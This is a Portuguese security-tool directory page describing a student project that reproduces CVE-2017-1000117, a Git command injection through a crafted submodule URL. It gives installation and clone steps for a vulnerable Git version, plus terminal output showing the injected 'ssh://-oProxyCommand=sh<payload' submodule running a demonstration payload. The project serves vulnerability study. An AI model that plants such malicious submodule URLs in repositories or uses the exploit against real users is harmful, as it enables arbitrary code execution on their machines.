Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2017-1000117 — Reprodução da vulnerabilidade CVE-2017-1000117 (PoC+Exp) | Kitploit
Ferramentas/GitHubGitHub/anonymking/cve-2017-1000117
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebAprendizado e EducaçãoLabs e Prática
GitHubanonymking/cve-2017-1000117

CVE-2017-1000117

Reprodução da vulnerabilidade CVE-2017-1000117 (PoC+Exp)

Ver Repositório
329há 7 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2017-1000117

Resumo do Projeto

  • Um dos tópicos do projeto do curso de segurança de redes
  • Reprodução da vulnerabilidade CVE-2017-1000117 (PoC+Exp)
  • Git + SSH

Introdução à Vulnerabilidade

  • Nome da vulnerabilidade: Vulnerabilidade de injeção de comandos Git
  • ID CNNVD: CNNVD-201708-670
  • Nível de perigo: Médio
  • ID CVE: CVE-2017-1000117
  • Tipo de vulnerabilidade: Injeção de comandos
  • Data de divulgação: 2017-08-16
  • Tipo de ameaça: Remota
  • Data de atualização: 2017-10-17
  • Fabricante: git-scm
  • Fonte da vulnerabilidade: TrevorJay
  • Resumo: Git é um sistema de controle de versão distribuído gratuito e de código aberto desenvolvido pelo desenvolvedor de software americano Linus Torvalds. Versões do Git anteriores a 2.7.5 contêm uma vulnerabilidade de comando. Atacantes remotos podem explorar esta vulnerabilidade através de uma URL especialmente criada 'ssh://...' para executar programas arbitrários em dispositivos que já foram encerrados.

Processo de Exploração

  • Instale uma versão do Git dentro do intervalo vulnerável (Git para Linux、Git para Windows))
  • Aqui escolhi a versão git-2.12.1 (testei e funciona tanto no Linux quanto no Windows) (Os links de download para a versão 2.12.1 no Linux e Windows são respectivamente git-2.12.1.tar.gz e Git-2.12.1-64-bit.tar.bz2)
  • Após instalar o Git, clone o projeto incluindo submódulos diretamente: git clone --recursive https://github.com/AnonymKing/CVE-2017-1000117.git
$ git clone --recursive https://github.com/AnonymKing/CVE-2017-1000117.git
Cloning into 'CVE-2017-1000117'...
remote: Enumerating objects: 14, done.
remote: Counting objects: 100% (14/14), done.
remote: Compressing objects: 100% (13/13), done.
remote: Total 14 (delta 3), reused 8 (delta 0), pack-reused 0
Unpacking objects: 100% (14/14), done.
Submodule 'exploit' (ssh://-oProxyCommand=sh<payload /exploit) registered for path 'exploit'
Cloning into 'C:/Users/AnonymKing/Desktop/Git-2.12.1-64-bit/test/CVE-2017-1000117/exploit'...
Pseudo-terminal will not be allocated because stdin is not a terminal.


*********************************************
                   _ooOoo_
                  o8888888o
                  88" . "88
                  (| -_- |)
                  O\  =  /O
               ____/`---'\____
             .'  \\|     |//  `.
            /  \\|||  :  |||//  \
           /  _||||| -:- |||||-  \
           |   | \\\  -  /// |   |
           | \_|  ''\---/''  |   |
           \  .-\__  `-`  ___/-. /
         ___`. .'  /--.--\  `. . __
      ."" '&lt;  `.___\_&lt;|>_/___.'  >'"".
     | | :  `- \`.;`\ _ /`;.`/ - ` : | |
     \  \ `-.   \_ __\ /__ _/   .-` /  /
======`-.____`-.___\_____/___.-`____.-'======
                   `=---='
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

ssh_exchange_identification: Connection closed by remote host
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.
fatal: clone of 'ssh://-oProxyCommand=sh<payload /exploit' into submodule path 'C:/Users/AnonymKing/Desktop/Git-2.12.1-64-bit/test/CVE-2017-1000117/exploit' failed
Failed to clone 'exploit'. Retry scheduled
  • Quando você vê o Buda aparecer, a vulnerabilidade já foi reproduzida e o código malicioso no payload foi executado com sucesso.

Atualização em 21/06/2019 10:30

  • Ao escrever o relatório, descobri de repente que esta vulnerabilidade é muito semelhante à CVE-2018-17456, apenas com uma abordagem diferente. A causa raiz é a incapacidade de analisar corretamente o símbolo "-", confundindo-o com um parâmetro, o que leva à execução arbitrária de código.
  • Sobre a exploração da vulnerabilidade CVE-2018-17456, consulte este artigo do blog: [《Análise da vulnerabilidade Git Submodule (CVE-2018-17456)》](https://paper.seebug.org/716/](https://paper.seebug.org/716/)

Atualização em 21/06/2019 19:39

  • Ao pesquisar materiais relacionados, encontrei outra vulnerabilidade muito semelhante, CVE-2018-11235
  • Sobre a vulnerabilidade CVE-2018-11235, aqui estão alguns artigos de referência: CVE-2018-11235 git RCE, PoC exploit for CVE-2018-11235, Análise detalhada da vulnerabilidade de execução remota de código do Git (CVE-2018-11235)
Baixar ferramenta